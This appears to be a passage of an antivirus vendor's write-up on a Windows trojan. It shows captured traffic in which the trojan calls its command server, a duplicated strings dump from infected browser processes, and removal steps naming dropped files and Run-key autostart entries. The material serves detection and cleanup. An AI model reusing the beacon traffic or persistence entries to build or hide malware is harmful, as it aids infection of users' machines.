Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sun, 03 Sep 2017 22
:52:48 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=ac4d38bd35719a3740693940c7873e1dd90854f4; e
xpires=Mon, 04-Sep-2017 00:52:48 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=5, max=100..Connection: Keep-A
live..Content-Type: text/html; charset=UTF-8..{"time_between_prints":"
15"}....


POST /api/v5/link HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: ladomainadeserver.com

Content-Length: 17

Expect: 100-continue

HTTP/1.1 100 Continue

....

uid=57a764d042bf8

HTTP/1.1 200 OK

Date: Sun, 03 Sep 2017 22:52:49 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=2c76bac47bc16101c5a351b027b2208a7324a172; expires=Mon, 04-Sep-2017 00:52:49 GMT; Max-Age=7200; path=/; httponly

Content-Length: 66

Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Sun, 03 Sep 2017 22:52:49 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=2c76b
ac47bc16101c5a351b027b2208a7324a172; expires=Mon, 04-Sep-2017 00:52:49
 GMT; Max-Age=7200; path=/; httponly..Content-Length: 66..Content-Type
: text/html; charset=UTF-8..{"link":"http:\/\/ladomainadeserver.com\/r
edirect\/57a764d042bf8"}..

The Trojan connects to the servers at the folowing location(s):

iexplore.exe_4080:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

8user32.dll

Kernel32.DLL

8xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_1296:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

8user32.dll

Kernel32.DLL

8xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

SecondL.exe:3716
Sho9libi.exe:2880
%original file name%.exe:2604
OneTwo.exe:2360
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe (265666 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\UHAS7BTKCT\Sho9libi.exe.config (1 bytes)
C:\config.conf (47 bytes)
%Program Files%\RHELWSD0FK\RHELWSD0F.exe (156158 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe (66836 bytes)
%Program Files%\RHELWSD0FK\uninstaller.exe.config (1 bytes)
%Program Files%\RHELWSD0FK\RHELWSD0F.exe.config (1 bytes)
%Program Files%\RHELWSD0FK\cast.config (36 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_UDDB6" = "C:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"D27LIUGNVB52SJ3" = "%Program Files%\RHELWSD0FK\RHELWSD0F.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"d3ydvryqdko" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\13pqxsz543f\r4ypgv5dbyy.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.